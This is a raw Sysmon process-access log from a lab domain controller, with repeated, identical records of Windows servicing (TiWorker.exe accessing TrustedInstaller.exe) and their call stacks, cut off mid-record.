13:58:30.726{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.711{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.711{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.711{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.711{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.695{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.695{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.695{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.680{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.680{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.680{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.680{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.680{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.664{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.664{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.664{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.664{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.648{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1